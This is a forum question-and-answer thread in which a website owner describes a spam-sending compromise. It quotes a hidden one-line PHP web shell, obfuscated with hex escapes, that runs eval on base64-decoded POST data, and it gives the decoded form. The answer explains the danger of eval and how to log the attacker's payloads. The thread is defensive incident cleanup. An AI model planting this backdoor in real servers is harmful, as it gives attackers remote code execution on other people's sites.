Malicious PHP file found on my webserver, need help cleaning and preventing this from happening again [closed]

Question

My hosting provider recently suspended my website because something on it was sending out enormous amounts of spam email. Originally me and the provider thought that this was due to an unsecured form for an email campaign I put up on the server a couple days prior. I removed the page with the form from the server, but the server was still sending spam emails.

I found a php file named 7c32.php in the "css" folder in the root directory of the server. I definitely did not make it. Here is the code that was in the file:

<?php if(isset($_POST["cod\x65"])){eval(base64_decode($_POST["co\x64e"]));}?>

After running it through an online decoder, this is what it came up with:

if(isset($_POST["code"])){eval(base64_decode($_POST["code"]));

I did some reading about malicious php files and saw that the eval( and base64_decode strings were highly suspect. I looked through the server log file and saw several post queries with this 7c32.php file originating from an ip address from Saudi Arabia.

I deleted the php file, updated all outdated wordpress themes and plugins (as well as the platform itsself, and changed the password to the FTP server and Wordpress administrative account to something much more secure.

Is there anything else I can do to ensure my server is secure? I'm about to go search for these base64 and eval( strings in every other php file on the server, but other than that, I'm out of ideas.

This php script seems rather too short to do any damage, but what else can be sending out all of that spam mail?

Any help would be greatly appreciated.

Answer 1

eval() is a very dangerous little language construct in that it can execute practically any piece of PHP code passed to it as a string, so it certainly could be that script sending the mail, although sending out spam is actually fairly non-destructive as far as what eval() could do.

If your page had the permissions to delete every file in your web root, eval() would also be able to do it too, just by someone sending the right command to the script via POST.

If you really want to ensure it is that piece of code sending out the mail, put it back but modify it to your advantage. Stop it from using eval() and instead save the POST data to a database or text file. It is the only way you will know exactly what this code is being used for.